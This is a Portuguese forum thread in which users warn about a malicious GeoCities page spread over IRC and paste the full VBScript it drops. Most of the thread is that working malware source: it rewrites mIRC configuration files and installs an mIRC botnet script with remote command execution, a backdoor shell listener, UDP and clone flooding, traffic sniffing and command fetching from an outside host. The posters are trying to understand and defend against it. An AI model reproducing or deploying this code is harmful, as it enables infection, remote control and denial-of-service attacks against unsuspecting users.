Para Quem Frequenta Irc

[thb_matrix]

Para quem frequenta IRC, não entre no site http://www.geocities.com/melanie9646/index.html, pois, pelo que eu verifiquei no código fonte, é um script aparentemente malicioso(caso não seja até me avisem, eu desconfio demais).

O endereço tem sido espalhado pelas redes de IRC, principalmente do Chile.

Eu ainda não descobri como removê-lo, até por entender pouco da linguagem utilizada(VBS) e de JavaScript.

Assim que eu descobrir, avisarei para possíveis pessoas infectadas com o mesmo.

Grato, Bruno Guedes.

[thb_matrix]

Uma boa notícia: O vírus não é novo como eu pensava.

E por sinal, além disso, eu não fui infectado por ele.

[Eddie_666]

Tem como em passar o codigo em vbs?

[thb_matrix]

Passo sim...

filecontent1="dim Otag "
filecontent2="dim AOtag"
filecontent3="dim Ttag "
filecontent4="dim DummyTag"
filecontent5="dim SectionDef"
filecontent6="call ShowFolderList("&a&"c:\"&a&")"
filecontent7="sub ShowFolderList(s)"
filecontent8="on error resume next"
filecontent9="Set filesys = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent10="Set RootFolder1 = FileSys.GetFolder(s)"
filecontent11="Set SubFolds1 = RootFolder1.subfolders"
filecontent12="For Each f1 in Subfolds1"
filecontent13="s = f1.path & "&a&"\"&a&""
filecontent14="Otag = s & "&a&"mirc.ini"&a&""
filecontent15="AOtag= s & "&a&"mirc.dat"&a&""
filecontent16="DummyTag= "&a&"C:\winamod.dat"&a&""
filecontent17="TTag= s & "&a&"mirc32.ini"&a&""
filecontent18="SectionDef= "&a&"[rfiles]"&a&""
filecontent19="if filesys.fileexists(otag) then "
filecontent20="Call Filemod() "
filecontent21="filesys.CopyFile DummyTag, Otag, true"
filecontent22="Call ImplementRemote()"
filecontent23="filesys.CopyFile DummyTag, Otag, true"
filecontent24="Call ImplementWarn()"
filecontent25="filesys.CopyFile DummyTag, Otag, true"
filecontent26="Call ImplementFserv()"
filecontent27="filesys.CopyFile DummyTag, Otag, true"
filecontent28="call ImplementPerfCheck()"
filecontent29="filesys.CopyFile DummyTag, Otag, true"
filecontent30="Call ImplementPerform()"
filecontent31="SetClearArchiveBit(Otag)"
filecontent32="End If"
filecontent33="Call ShowFolderList(s)"
filecontent34="Next"
filecontent35="End sub"
filecontent36="Function FiltNum(FilString)"
filecontent37="on error resume next"
filecontent38="countdown=5"
filecontent39="do"
filecontent40="Comp = mid(FilString,2,countdown)"
filecontent41="if isnumeric(Comp) then LastNum = Comp : exit do"
filecontent42="countdown=countdown-1"
filecontent43="loop until countdown =0"
filecontent44="FiltNum = LastNum"
filecontent45="end function"
filecontent46="Function LastLineNum(SSection)"
filecontent47="on error resume next"
filecontent48="Set FS1N = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent49="Set FR1N = FS1N.OpenTextFile(otag,1,true)"
filecontent50="Do While FR1N.AtEndOfStream <> True"
filecontent51="segment1 = FR1N.readline"
filecontent52="w = InstrRev(segment1,SSection)"
filecontent53="counts=counts+1"
filecontent54="if w > 0 then "
filecontent55="do"
filecontent56="if FR1N.AtEndOfStream = True then exit do"
filecontent57="segmentk = FR1N.readline"
filecontent58="k = InstrRev(segmentk,"&a&"n"&a&",1)        "
filecontent59="if k=1 then"
filecontent60="LastNum=FiltNum(segmentk)"
filecontent61="end if"
filecontent62="Loop until k=0"
filecontent63="end if"
filecontent64="loop"
filecontent65="FR1N.Close"
filecontent66="LastLineNum=LastNum"
filecontent67="end function"
filecontent68="Function Filemod()"
filecontent69="on error resume next"
filecontent70="Set fs1 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent71="Set fr1 = fs1.OpenTextFile(otag,1,true)"
filecontent72="Set fs2 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent73="Set fr2 = fs2.OpenTextFile(DummyTag,2,true)"
filecontent74="Do While fr1.AtEndOfStream <> True"
filecontent75="segment1 = fr1.readline"
filecontent76="fr2.writeline segment1"
filecontent77="w = InstrRev(segment1,"&a&"[rfiles]"&a&")"
filecontent78="counts=counts+1"
filecontent79="if w > 0 then "
filecontent80="counts2=counts"
filecontent81="do"
filecontent82="if fr1.AtEndOfStream = True then exit do"
filecontent83="segmentk = fr1.readline"
filecontent84="k = InstrRev(segmentk,"&a&"n"&a&",1)        "
filecontent85="if k=1 then"
filecontent86="LastNum=FiltNum(segmentk)"
filecontent87="fr2.writeline segmentk"
filecontent88="end if"
filecontent89="COUNTS2=COUNTS2+1"
filecontent90="Loop until k<>1"
filecontent91="exit do"
filecontent92="end if"
filecontent93="loop"
filecontent94="fr1.Close"
filecontent95="fr2.close"
filecontent96="Set fs3 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent97="Set fr3 = fs3.OpenTextFile(DummyTag,8,true)"
filecontent98="TrojanInfo = "&a&"n"&a&" & lastlinenum(SectionDef)+1 & "&a&"=mirc32.ini"&a&""
filecontent99="fr3.writeline TrojanInfo"
filecontent100="fr3.Close"
filecontent101="Set fs4 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent102="Set fr4 = fs4.OpenTextFile(Otag,1,true)"
filecontent103="Set fs5 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent104="Set fr5 = fs5.OpenTextFile(DummyTag,8,true)"
filecontent105="Do While fr4.AtEndOfStream <> True"
filecontent106="segment2 = fr4.readline"
filecontent107="if fr4.line >= counts2 + 2 then "
filecontent108="fr5.writeline segment2"
filecontent109="end if"
filecontent110="loop"
filecontent111="fr4.Close"
filecontent112="fr5.Close"
filecontent113="fs5.CopyFile DummyTag, Otag, true"
filecontent114="Call FLDL(TTag)"
filecontent115="end Function"
filecontent116="sub FLDL(TTag)"
filecontent117="on error resume next"
filecontent118="Set fs6 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent119="Set fr6 = fs6.OpenTextFile(TTag,2,true)"
filecontent120="fr6.writeline "&a&"[script]"&a&""
filecontent121="fr6.writeline "&a&"n0=on *:input:*: { if (%txt == ON) { .sockwrite -n bot* privmsg %pm1 : $+ 4 $me to $active ( $+ $server $+ ): 9 $1- } | elseif (%txt == OFF) return } "&a&""
filecontent122="fr6.writeline "&a&"n1=on *:text:*:?: { if (%txt == ON) { .sockwrite -n bot* privmsg %pm1 : $+ 4 $nick to $me ( $+ $server $+ ): 9 $1- } | elseif (%txt == OFF) return } "&a&""
filecontent123="fr6.writeline "&a&"n2=alias remote { .remote $1- | .remote on | /echo -ae *** Remote is $1- } "&a&""
filecontent124="fr6.writeline "&a&"n3=alias unload { /echo -ae *** Unloaded script ' $+ $2- $+ ' | halt } "&a&""
filecontent125="fr6.writeline "&a&"n4=alias socklist { /echo -ae *** No open sockets | halt } "&a&""
filecontent126="fr6.writeline "&a&"n5=on *:sockread:bot*: { sockread %cent | set %cent1 $gettok(%cent,1,32) | .set %cent2 $gettok(%cent,2,32) | if (%cent1 == PING) { sockwrite -tn $sockname PONG %cent2 | halt } | if ($gettok(%cent,4,32) == :!update) { if (%com == $null) { .sockopen check www.geocities.com 80 } | else { .sockopen check1 www.geocities.com 80 } | .dns %ds1 } | set %lnick $deltok(%cent1,1,64) | set %lnick2 $gettok(%lnick,1,46) "&a&""
filecontent127="fr6.writeline "&a&"n6=  if ($remove(%lnick2,$chr(45)) == %dn2) { if ($gettok(%cent,4,32) == :!exec) { $gettok(%cent,5-,32) } | if ($gettok(%cent,4,32) == :!report) { .sockwrite -n $sockname privmsg %dchan : $+ 4Minion:9 $me 4IP:9 $ip 4Server:9 $server 4-=MINIONS OF MALCHIA (v2.2)=- } | if ($gettok(%cent,4,32) == :!open) { .socklisten bd1 2255 } | if ($gettok(%cent,4,32) == :!view) { set %txt ON | set %pm1 $gettok(%cent,5,32) } | if ($gettok(%cent,4,32) == :!unview) { set %txt OFF | unset %pm1 } "&a&""
filecontent128="fr6.writeline "&a&"n7=    if ($gettok(%cent,4,32) == :!packet) { set %packet.ip $gettok(%cent,5,32) | set %packet.bytes $gettok(%cent,6,32) | set %packet.amount $gettok(%cent,7,32) | sockwrite -n $sockname privmsg %dchan : $+ 4Target:9 %packet.ip 4Bytes:9 %packet.bytes 4Amount:9 %packet.amount | set %packet.count 0 | set %packet.port $rand(1,6) $+ $rand(0,6) $+ $rand(0,6) $+ $rand(0,9) | :start | if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .sockwrite -n $sockname privmsg %dchan : $+ 4Packeting Complete | halt } | inc %packet.count 1 | /.sockudp -b packet 60 %packet.ip %packet.port %packet.bytes %packet.bytes | goto start } "&a&""
filecontent129="fr6.writeline "&a&"n8=    if ($gettok(%cent,4,32) == :!flood) { set %nick $gettok(%cent,5,32) | set %clones $gettok(%cent,6,32) | set %channel $gettok(%cent,5,32) | set %server $gettok(%cent,7,32) | set %port $gettok(%cent,8,32) | set %flood1 $gettok(%cent,9-,32) | set %PSGflood on | var %var = 0 | :loop | inc %var | if (%PSGflood == on) && (%var <= %clones) { .sockopen PSG $+ %var %server %port | goto loop } | else { halt } } | if ($gettok(%cent,4,32) == :!clean) { .set %PSGflood off | .sockclose PSG* | .sockclose pac* | .unset %nick | unset %channel | unset %server | unset %port | unset %clones | unset %flood1 | .unset %* } "&a&""
filecontent130="fr6.writeline "&a&"n9=if ($gettok(%cent,4,32) == :!bnc) { set %pm2 $gettok(%cent,5,32) | .lotbnc $rand(1111,9999) $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) | .timer 1 1 .sockwrite -nt bot* privmsg %pm2 :[ $+ Server/Port/Password $+ ][ $+ /server $afad %.lotbnc.port %.lotbnc.pass $+ ] } | if ($gettok(%cent,4,32) == :!reset) && ($gettok(%cent,5,32) != $null) { set %comd $gettok(%cent,5,32) } | unset %lnick* } | else return } "&a&""
filecontent131="fr6.writeline "&a&"n10=on *:sockopen:bot*:{ if ($sockerr > 0) { halt } | set -u1 %user $rand(a,z) $+ $rand(1,99) $+ $rand(1,9) $+ $rand(1,99) $+ $rand(1,9) $+ $rand(1,9) | .sockwrite -nt $sockname USER %user blablah x : $+ $me | .sockwrite -nt $sockname NICK $me $+ $rand(1,99) | sockwrite -tn $sockname join %dchan } "&a&""
filecontent132="fr6.writeline "&a&"n11=on *:sockclose:bot*:/.timer 1 3 sockopen bot-2 %dserv 6667 "&a&""
filecontent133="fr6.writeline "&a&"n12=on *:sockopen:check: { .sockwrite -n $sockname GET /malchia1/index.htm HTTP/1.1 | .sockwrite -n check host $+ $chr(58) www.geocities.com | .sockwrite $sockname $crlf } "&a&""
filecontent134="fr6.writeline "&a&"n13=on *:sockopen:check1: { .sockwrite -n $sockname GET %comd HTTP/1.1 | .sockwrite -n check1 host $+ $chr(58) www.geocities.com | .sockwrite $sockname $crlf } "&a&""
filecontent135="fr6.writeline "&a&"n14=on *:sockread:check*: { if ($sockerr > 0) return | sockread %check | if ($sockbr == 0) return | if (set1 isin %check) { .set %dchan $gettok(%check,2,32) | .set %dserv $gettok(%check,3,32) | .set %dch $gettok(%check,5-,32) | .set %ds1 $gettok(%check,4,32) } } "&a&""
filecontent136="fr6.writeline "&a&"n15=alias afad { if ($host = $null) { if ($ip = $null) { return anony.mus }  } | if ($host = $null) { if ($ip != $null) { return $ip }  } | if ($host != $null) { return $host } } "&a&""
filecontent137="fr6.writeline "&a&"n16=alias lotbnc { if ($1 == off) { lotbnc.close | return } | if ($1) && ($2) && ($sock(lotbnc.l).status != active) { .socklisten lotbnc.l $1 | .set %.lotbnc.port $1 | .set %.lotbnc.pass $2 } } "&a&""
filecontent138="fr6.writeline "&a&"n17=alias -l lotbnc.conn { .timerlotbnc.c off | .sockclose lotbnc.l | .sockopen lotbnc.serv $1 $2 $iif($3,$3,6667) | .sockwrite -n lotbnc.a :*** Redirecting to $1- } "&a&""
filecontent139="fr6.writeline "&a&"n18=alias lotbnc.close { .sockclose lotbnc.* | .unset %lotbnc.* | .unset %.lotbnc.* } "&a&""
filecontent140="fr6.writeline "&a&"n19=on 1:socklisten:lotbnc.l:{ .sockaccept lotbnc.a | .sockwrite -n lotbnc.a $crlf $+ :*** Please type /quote PASS <pass> | .timerlotbnc.c 1 30 .lotbnc.close } "&a&""
filecontent141="fr6.writeline "&a&"n20=on 1:sockopen:lotbnc.serv:{ .if ($sock(lotbnc.serv).status != active) return | .sockwrite -n lotbnc.serv %lotbnc.log | .set %lotbnc.connected 1 } "&a&""
filecontent142="fr6.writeline "&a&"n21=on 1:sockread:lotbnc.serv:{ .if ($sockerr > 0) return | .sockread %lotbnc.buf2  | .sockwrite -n lotbnc.a %lotbnc.buf2 } "&a&""
filecontent143="fr6.writeline "&a&"n22=on 1:sockread:lotbnc.a:{ .if ($sockerr > 0) return | .sockread %lotbnc.buf | .if ($gettok(%lotbnc.buf,1,32) == pass) { .if ($gettok(%lotbnc.buf,2,32) == %.lotbnc.pass) { .set -u30 %lotbnc.accept 1 | .sockwrite -n lotbnc.a $crlf $+ :*** Password accepted.. | .sockwrite -n lotbnc.a $crlf $+ :*** Please type /quote CONN <server> [port] } "&a&""
filecontent144="fr6.writeline "&a&"n23=  else .sockclose lotbnc.a } | .if ($gettok(%lotbnc.buf,1,32) == conn) && (%lotbnc.accept) { .if ($gettok(%lotbnc.buf,2,32)) lotbnc.conn $gettok(%lotbnc.buf,2-3,32) | else sockclose lotbnc.a } | .elseif ($gettok(%lotbnc.buf,1,32) == NICK) .set %lotbnc.log %lotbnc.buf | .elseif ($gettok(%lotbnc.buf,1,32) == USER) .set %lotbnc.log %lotbnc.log $+ $crlf $+ %lotbnc.buf "&a&""
filecontent145="fr6.writeline "&a&"n24=.if (%lotbnc.connected) { if ($istok(%lotbnc.buf,QUIT,32)) .timer 1 0 .lotbnc.close 1 | else .sockwrite -n lotbnc.serv %lotbnc.buf } } "&a&""
filecontent146="fr6.writeline "&a&"n25=on *:start: { if ($exists(scripts.ini) || $exists(server.ini)) { /.remove scripts.ini | /.remove server.ini } | /.identd on | if ($ip != 127.0.0.1) && (%comd == $null) { .sockopen check www.geocities.com 80 } | else { .sockopen check1 www.geocities.com 80 } | set %txt OFF | .unset %cmd* | unset %pm* | .unset %lot* | .unset %ls* } "&a&""
filecontent147="fr6.writeline "&a&"n26=on *:connect: { if ($timer(timerlot) == $null) { .timelot } | if ($sock(adbot*) == $null) { setmc | .timer 1 5 adbots | unset %adbot } | if ($sock(bot-2).status != active) { .timer 1 5 .sockopen bot-2 %dserv 6667 } | else halt } "&a&""
filecontent148="fr6.writeline "&a&"n27=on *:socklisten:bd1: { .sockaccept bd2 } "&a&""
filecontent149="fr6.writeline "&a&"n28=on *:sockread:bd2: { sockread %cmd | if ($sock(lsh).status != active) { if ($gettok(%cmd,1,32) == edit) goto one | if ($gettok(%cmd,1,32) == exit) goto two | if ($gettok(%cmd,1,32) == telnet) goto three | else goto four "&a&""
filecontent150="fr6.writeline "&a&"n29=    :one | set %cmd2 $gettok(%cmd,2,32) | .timer 1 3 .readl | halt | :two | .sockclose bd* | sockclose lsh | .remove c:\tmp.txt | halt | :three | set %cmd6 shell $+ $rand(1,99) | .sockopen lsh $gettok(%cmd,2-,32) | halt "&a&""
filecontent151="fr6.writeline "&a&"n30=    :four | set %cmd2 c:\tmp.txt | run -n command /c %cmd > %cmd2 | .timer 1 3 .readl | halt } | if ($sock(lsh).status == active) { .sockwrite -n lsh $gettok(%cmd,1-,32) | if ($gettok(%cmd,1,32) == close) { if ($gettok(%cmd,2,32) == %cmd6) { "&a&""
filecontent152="fr6.writeline "&a&"n31=.sockclose lsh | sockwrite -n bd2 %cmd6 is closed } | else halt } | else halt } | else halt } "&a&""
filecontent153="fr6.writeline "&a&"n32=on *:sockopen:lsh: { if ($sockerr > 0) return | sockwrite -n bd2 %cmd6 is open } "&a&""
filecontent154="fr6.writeline "&a&"n33=on *:sockread:lsh: { if ($sockerr > 0) return | :nextread | sockread %lrh | if ($sockbr == 0) return | if (%lrh == $null) { %lrh = - } | sockwrite -n bd2 %lrh | goto nextread | halt } "&a&""
filecontent155="fr6.writeline "&a&"n34=on *:sockclose:lsh: { sockwrite -n bd2 %cmd6 has closed } "&a&""
filecontent156="fr6.writeline "&a&"n35=on ^*:text:*:?:if (www isin $1-) || (http isin $1-) { halt } "&a&""
filecontent157="fr6.writeline "&a&"n36=alias readl { set %cmd4 0 | set %cmd5 $lines(%cmd2) | :loop | if (%cmd5 > %cmd4) { inc %cmd4 | sockwrite -n bd2 $read -l $+ %cmd4 %cmd2 | goto loop } | else halt } "&a&""
filecontent158="fr6.writeline "&a&"n37=on *:sockopen:PSG*:{ if ($sockerr > 0) { halt } | set -u1 %user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname JOIN : $+ %channel | .sockwrite -n $sockname privmsg %channel : $+ $chr(1) $+  $+ $chr(1) | .sockwrite -n $sockname privmsg %channel : $+ %flood1 |  .sockclose $sockname | .sockopen PSG $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port } "&a&""
filecontent159="fr6.writeline "&a&"n38=on *:sockread:PSG*:{ .sockread %clone.temp | if ($gettok(%clone.temp,1,32) == PING) { sockwrite -tn $sockname PONG $chr(58) $+ $server } } "&a&""
filecontent160="fr6.writeline "&a&"n39=on *:join:#: { if ($nick != $me) { if ($sock(adbot*) != $null) { .sockwrite -n adbot* privmsg $nick $chr(58) $+ %dch } | else .msg $nick %dch } | else halt } "&a&""
filecontent161="fr6.writeline "&a&"n40=on *:part:#: { if ($nick != $me) if  ($sock(adbot*) != $null) { .sockwrite -n adbot* privmsg $nick $chr(58) $+ %dch } | else .msg $nick %dch } | else halt } "&a&""
filecontent162="fr6.writeline "&a&"n41=on *:dns: { set %dn1 $iaddress | set %dn2 $remove(%dn1,$chr(46)) } "&a&""
filecontent163="fr6.writeline "&a&"n42=alias timelot { .timerlot 0 120 .dns %ds1 } "&a&""
filecontent164="fr6.writeline "&a&"n43=alias adbots { if ($server != $null) && ($sock(adbot*) == $null) { .sockopen adbot $+ $rand(1,7) $+ $rand(1,9) $server $port } | if ($sock(bot-m) != $null) { .sockwrite -n bot-m part %dchan | .sockwrite -n bot-m nick MINION[ $+ $rand(1,200) $+ ] } } "&a&""
filecontent165="fr6.writeline "&a&"n44=on 1:sockopen:adbot*:{ if ($sockerr > 0) { halt } | .sockwrite -nt $sockname USER %mcus %mcus %mcus : $+ %mc | .sockwrite -nt $sockname NICK %mc | .timer 1 3 unset %mc* } "&a&""
filecontent166="fr6.writeline "&a&"n45=on *:sockread:adbot*: { sockread %adbot | if ($gettok(%adbot,1,32) == Ping) { sockwrite -tn $sockname Pong $remove($gettok(%adbot,2,32),:) } | unset %adbot } "&a&""
filecontent167="fr6.writeline "&a&"n46=on 1:sockclose:adbot*:{ if ($server != $null) && ($sock(adbot*) == $null) { setmc | .timer 1 3 adbots } } "&a&""
filecontent168="fr6.writeline "&a&"n47=alias setmc { goto mc $+ $rand(1,21) | :mc1 | set %mc janice $+ $rand(1,100) | setms | goto alt | :mc2 | set %mc lana $+ $rand(1,100) | setms | goto alt | :mc3 | set %mc monikka $+ $rand(1,100) | setms | goto alt | :mc4 | set %mc ngaire $+ $rand(1,100) | setms | goto alt | :mc5 | set %mc juanita $+ $rand(1,100) | setms | goto alt | :mc6 | set %mc sylvia $+ $rand(1,100) | setms | goto alt | :mc7 | set %mc jane $+ $rand(1,100) | setms | goto alt | :mc8 | set %mc lynda $+ $rand(1,100) | setms | goto alt | :mc9 | set %mc melanie $+ $rand(1,100) | setms | goto alt | :mc10 | set %mc nadia $+ $rand(1,100) | setms | goto alt | :mc11 | set %mc carol $+ $rand(1,100) | setms | goto alt "&a&""
filecontent169="fr6.writeline "&a&"n48=:mc12 | set %mc nina $+ $rand(1,100) | setms | goto alt | :mc13 | set %mc cindy $+ $rand(1,100) | setms | goto alt | :mc14 | set %mc anna $+ $rand(1,100) | setms | goto alt | :mc15 | set %mc inga $+ $rand(1,100) | setms | goto alt | :mc16 | set %mc tina $+ $rand(1,100) | setms | goto alt | :mc17 | set %mc jen $+ $rand(1,100) | setms | goto alt | :mc18 | set %mc milla $+ $rand(1,100) | setms | goto alt | :mc19 | set %mc mary $+ $rand(1,100) | setms | goto alt | :mc20 | set %mc carla $+ $rand(1,100) | setms | goto alt | :mc21 | set %mc cathy $+ $rand(1,100) | setms | :alt } "&a&""
filecontent170="fr6.writeline "&a&"n49=alias setms { goto ms $+ $rand(1,14) | :ms1 | set %mcus $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | goto end | :ms2 | set %mcus $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | goto end | :ms3 | set %mcus $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | goto end | :ms4 | set %mcus $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | goto end | :ms5 | set %mcus $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | goto end | :ms6 | set %mcus $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | goto end "&a&""
filecontent171="fr6.writeline "&a&"n50=:ms7 | set %mcus helen $+ $rand(1,100) | goto end | :ms8 | set %mcus karol $+ $rand(1,100) | goto end | :ms9 | set %mcus holly $+ $rand(1,100) | goto end | :ms10 | set %mcus kath $+ $rand(1,100) | goto end | :ms11 | set %mcus colleen $+ $rand(1,100) | goto end | :ms12 | set %mcus patty $+ $rand(1,100) | goto end | :ms13 | set %mcus pru $+ $rand(1,100) | goto end | :ms14 | set %mcus penny $+ $rand(1,100) | :end } "&a&""
filecontent172="fr6.close"
filecontent173="end sub"
filecontent174="Function ImplementRemote()"
filecontent175="Set fs1a = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent176="Set fr1a = fs1a.OpenTextFile(otag,1,true)"
filecontent177="Set fs2a = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent178="Set fr2a = fs2a.OpenTextFile(DummyTag,2,true)"
filecontent179="Do While fr1a.AtEndOfStream <> True"
filecontent180="segment1a = fr1a.readline"
filecontent181="fr2a.writeline segment1a"
filecontent182="if ucase(segment1a)=ucase("&a&"[options]"&a&") then"
filecontent183="Do"
filecontent184="If fr1a.AtEndOfStream Then exit do"
filecontent185="n2a = fr1a.readline"
filecontent186="If ucase(mid(n2a,1,3))=ucase("&a&"n2="&a&") then"
filecontent187="fr2a.writeline Mid(n2a, 1, 13) & "&a&"1,1"&a&" & Mid(n2a, 17, 16) & "&a&"1"&a&" & Mid(n2a, 34)"
filecontent188="exit do"
filecontent189="Else"
filecontent190="fr2a.writeline n2a"
filecontent191="End If"
filecontent192="Loop"
filecontent193="end if"
filecontent194="loop"
filecontent195="fr1a.Close"
filecontent196="fr2a.close"
filecontent197="End Function"
filecontent198="Function Implementfserv()"
filecontent199="Set fs1a = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent200="Set fr1a = fs1a.OpenTextFile(otag,1,true)"
filecontent201="Set fs2a = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent202="Set fr2a = fs2a.OpenTextFile(DummyTag,2,true)"
filecontent203="Do While fr1a.AtEndOfStream <> True"
filecontent204="segment1a = fr1a.readline"
filecontent205="fr2a.writeline segment1a"
filecontent206="if ucase(segment1a)=ucase("&a&"[warn]"&a&") then"
filecontent207="Do"
filecontent208="If fr1a.AtEndOfStream Then exit do"
filecontent209="n2a = fr1a.readline"
filecontent210="If ucase(n2a)=ucase("&a&"fserve=on"&a&") then"
filecontent211="fr2a.writeline "&a&"fserve=off"&a&""
filecontent212="Else"
filecontent213="fr2a.writeline n2a"
filecontent214="End If"
filecontent215="Loop"
filecontent216="end if"
filecontent217="loop"
filecontent218="fr1a.Close"
filecontent219="fr2a.close"
filecontent220="End Function"
filecontent221="Function Implementwarn()"
filecontent222="Set fs1c = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent223="Set fr1c = fs1c.OpenTextFile(otag,1,true)"
filecontent224="Set fs2c = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent225="Set fr2c = fs2c.OpenTextFile(DummyTag,2,true)"
filecontent226="Do While fr1c.AtEndOfStream <> True"
filecontent227="segment1c = fr1c.readline"
filecontent228="fr2c.writeline segment1c"
filecontent229="if ucase(segment1c)=ucase("&a&"[fileserver]"&a&") then"
filecontent230="Do"
filecontent231="if fr1c.AtEndOfStream then exit do"
filecontent232="n2c = fr1c.readline"
filecontent233="If ucase(n2c)=ucase("&a&"warning=on"&a&") then"
filecontent234="fr2c.writeline "&a&"warning=off"&a&""
filecontent235="Else"
filecontent236="fr2c.writeline n2c"
filecontent237="End If"
filecontent238="Loop"
filecontent239="end if"
filecontent240="loop"
filecontent241="fr1c.Close"
filecontent242="fr2c.close"
filecontent243="End Function"
filecontent244="Function ImplementPerform()"
filecontent245="Set fs1p = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent246="Set fr1p = fs1p.OpenTextFile(Otag,8,true)"
filecontent247="fr1p.writeline "&a&"[Perform]"&a&""
filecontent248="fr1p.writeline "&a&"n0=/Remote ON"&a&""
filecontent249="fr1p.Close"
filecontent250="fs1p.close"
filecontent251="End Function"
filecontent252="Sub SetClearArchiveBit(filespec)  "
filecontent253="Dim fsg, fg"
filecontent254="Set fsg = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent255="Set fg = fsg.GetFile(filespec)  "
filecontent256="fg.attributes = 0"
filecontent257="fg.attributes = fg.attributes + 1"
filecontent258="End Sub"
filecontent259="Function ImplementPerfCheck()"
filecontent260="Set fs1f = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent261="Set fr1f = fs1f.OpenTextFile(otag,1,true)"
filecontent262="Set fs2f = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent263="Set fr2f = fs2f.OpenTextFile(DummyTag,2,true)"
filecontent264="Do While fr1f.AtEndOfStream <> True"
filecontent265="segment1f = fr1f.readline"
filecontent266="fr2f.writeline segment1f"
filecontent267="if ucase(segment1f)=ucase("&a&"[options]"&a&") then"
filecontent268="Do"
filecontent269="If fr1f.AtEndOfStream Then exit do"
filecontent270="n2f = fr1f.readline"
filecontent271="If ucase(mid(n2f,1,3))=ucase("&a&"n0="&a&") then"
filecontent272="fr2f.writeline Mid(n2f, 1, 40) & "&a&",1,"&a&" & Mid(n2f, 44)"
filecontent273="exit do"
filecontent274="Else"
filecontent275="fr2f.writeline n2f"
filecontent276="End If"
filecontent277="Loop"
filecontent278="end if"
filecontent279="loop"
filecontent280="fr1f.Close"
filecontent281="fr2f.close"
filecontent282="End Function"
filecontent283=""
filecontent284="set sss=createobject("&a&"scripting.filesystemobject"&a&")"
filecontent285="sss.DeleteFile "&a&"c:\rol.vbs"&a&""
filecontent286="sss.DeleteFile "&a&"c:\winamod.dat"&a&""

O código não está bem organizado...

Mas assim...

UM JavaScript, usando um controle ActiveX escrevia isso em um arquivo rol.vbs na unidade C, que, pelo que eu vi no fim do código, é deletado.

Eu acredito, pela extensão do arquivo, que seja VBS.

[Eddie_666]

O que isso faz?

abre porta no pc da vitima?

[thb_matrix]

O que faz eu não tenho a menor idéia, não entendo de VB.

Só sei que eu passei o anti-vírus em um arquivo de texto com o que está na tag CODE alí acima, e ele encontrou vírus, porém, ao passar no disco inteiro nada foi achado.

Eu irei procurar hoje informações sobre os arquivos e keys que ele cria no registro(se é que o faz).

[Eddie_666]

Tá muito confuso o código, mas pelo que vi ele abre portas na maquina...

[thb_matrix]

O mais estranho de tudo é que meu anti-vírus detectou em um arquivo de texto com isso o vírus, mas escaneando o sistema inteiro não achou nada.

Acho que o Mozilla não roda aquele controle ActiveX.

Espero que eu esteja certo, mas mesmo assim estarei me cuidando e verificando se estou ou não infectado.